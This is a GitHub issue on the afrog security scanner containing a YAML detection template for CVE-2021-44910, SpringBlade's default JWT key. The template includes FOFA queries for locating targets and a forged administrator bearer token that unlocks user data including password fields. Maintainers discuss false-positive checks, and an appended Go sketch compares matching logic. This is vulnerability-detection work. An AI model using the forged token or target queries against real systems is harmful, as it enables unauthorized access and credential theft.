zan8in / afrog

A Security Tool for Bug Bounty, Pentest and Red Teaming.
MIT License

CVE-2021-44910 #124

Open leonardo-o1 opened 5 months ago

leonardo-o1 commented 5 months ago

FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"

Verification: [image]

id: CVE-2021-44910  # identifier; must match the file name; note the space after every colon

info:   # PoC metadata; mind the indentation (parent/child nesting), YAML is whitespace-sensitive like Python
  name: SpringBlade 框架JWT认证缺陷漏洞
  author: leo   # author
  severity: high    # severity level: info, low, medium, high, critical
  tags: SpringBlade
  verified: true  # true = the vulnerability has been verified, false = not verified
  description: |    # vulnerability description, fingerprint query, etc.; "|" is YAML's multi-line block syntax
   SpringBlade 框架jwt存在默认key,可任意篡改登录凭证jwt
   FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
  reference: # referenced articles
  - https://forum.butian.net/share/973
  - https://github.com/chillzhuang/blade-tool/blob/master/blade-core-launch/src/main/java/org/springblade/core/launch/constant/TokenConstant.java  # "- " adds a list item
  - https://github.com/dockererr/CVE-2021-44910_SpringBlade/blob/main/CVE-2021-44910.py

rules:  # PoC body: the set of rules
  r0:   # rule names are arbitrary
    request:  # the request
      method: GET  # POST, PUT or GET
      path: /api/blade-user/info  # path; alternatives: api/blade-user/user-list, api/blade-log/api/list
    expression: response.status == 401 && response.body.bcontains(b'"code":401')

  r1:   # rule names are arbitrary
    request:  # the request
      method: GET  # POST, PUT or GET
      path: /api/blade-user/info  # path; alternatives: api/blade-user/user-list, api/blade-log/api/list
      headers:
        Blade-Auth: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg
    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"success":true')

expression: r0() && r1()

zan8in commented 5 months ago

Thanks, but your expression check is too simple and prone to false positives; it would be better to add some uniqueness checks next time.

leonardo-o1 commented 5 months ago

Thanks, but your expression check is too simple and prone to false positives; it would be better to add some uniqueness checks next time.

OK, I added a check that the unauthenticated request returns 401; please take another look.

zan8in commented 5 months ago

Good approach. I wrote a PoC for this vulnerability before and it is now uploaded to GitHub; have a look and decide whether you want your PoC merged into it.

ViCrack commented 5 months ago

No need to add the pre-authentication check; that saves requests. Judging from this screenshot, the returned JSON has quite a few fields, so adding field fingerprints should be enough:

      - '"success":true'
      - '"account":'
      - '"password":'
      - createDept
      - xxxxxxx
      - xxxxxxxx

[image]

nuclei also has a YAML template for this.
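As an added illustration (not code from this issue, from afrog, or from nuclei), the Go program below re-implements the r0 && r1 structure of the PoC above together with the field-fingerprint idea from the last comment, and runs both the original status-only check and the stricter fingerprint check over constructed sample responses. It shows concretely why the weak check fires on any generic SpringBlade-style success envelope while the fingerprint check only fires when the user record actually comes back. The Response type, the helper names (bcontains, WeakMatch, StrongMatch, Verdict) and all three sample bodies are assumptions made for this example; afrog's real expression engine is not involved.

```go
package main

import (
	"bytes"
	"fmt"
)

// Response is a constructed stand-in for the object an afrog rule expression
// evaluates against (response.status, response.body).
type Response struct {
	Status int
	Body   []byte
}

// bcontains mirrors the expression helper response.body.bcontains(b'...'):
// a plain byte-substring test.
func bcontains(body []byte, needle string) bool {
	return bytes.Contains(body, []byte(needle))
}

// WeakMatch is the original r1 expression from the issue: status 200 plus
// "code":200 and "success":true. Any endpoint that answers with the
// framework's generic success envelope satisfies it.
func WeakMatch(r Response) bool {
	return r.Status == 200 &&
		bcontains(r.Body, `"code":200`) &&
		bcontains(r.Body, `"success":true`)
}

// Fingerprints are the field markers suggested in the thread for the
// /api/blade-user/info response; the "xxxxxxx" placeholders are left out.
var Fingerprints = []string{`"success":true`, `"account":`, `"password":`, `createDept`}

// StrongMatch requires every fingerprint, so the rule only fires when the
// endpoint really returned a user record rather than some other 200 body.
func StrongMatch(r Response) bool {
	if r.Status != 200 || !bcontains(r.Body, `"code":200`) {
		return false
	}
	for _, f := range Fingerprints {
		if !bcontains(r.Body, f) {
			return false
		}
	}
	return true
}

// Verdict models the top-level expression r0() && r1(): the request without
// a token must be rejected with 401, and the request with the token must
// pass either the weak or the strict r1 check.
func Verdict(unauth, auth Response, strict bool) bool {
	r0 := unauth.Status == 401 && bcontains(unauth.Body, `"code":401`)
	if strict {
		return r0 && StrongMatch(auth)
	}
	return r0 && WeakMatch(auth)
}

// Constructed sample responses (assumed shapes, not captured from any host).
var (
	// r0: unauthenticated request rejected.
	Unauth = Response{Status: 401, Body: []byte(`{"code":401,"success":false,"msg":"unauthorized"}`)}
	// r1 on an affected instance: the user record comes back.
	UserInfo = Response{Status: 200, Body: []byte(`{"code":200,"success":true,"data":{"id":"1","account":"admin","password":"<hash>","createDept":"1"},"msg":"ok"}`)}
	// r1 on an unrelated endpoint: success envelope, but no user record.
	Generic = Response{Status: 200, Body: []byte(`{"code":200,"success":true,"data":[],"msg":"ok"}`)}
)

func main() {
	fmt.Println("user record, weak  :", Verdict(Unauth, UserInfo, false)) // true
	fmt.Println("user record, strict:", Verdict(Unauth, UserInfo, true))  // true
	fmt.Println("generic body, weak  :", Verdict(Unauth, Generic, false)) // true (false positive)
	fmt.Println("generic body, strict:", Verdict(Unauth, Generic, true))  // false
}
```

The strict variant keeps the r0 pre-check from the revised PoC; if you prefer the single-request approach from the last comment, drop the r0 conjunct and rely on the fingerprints alone, at the cost of no longer proving that the endpoint rejects unauthenticated callers.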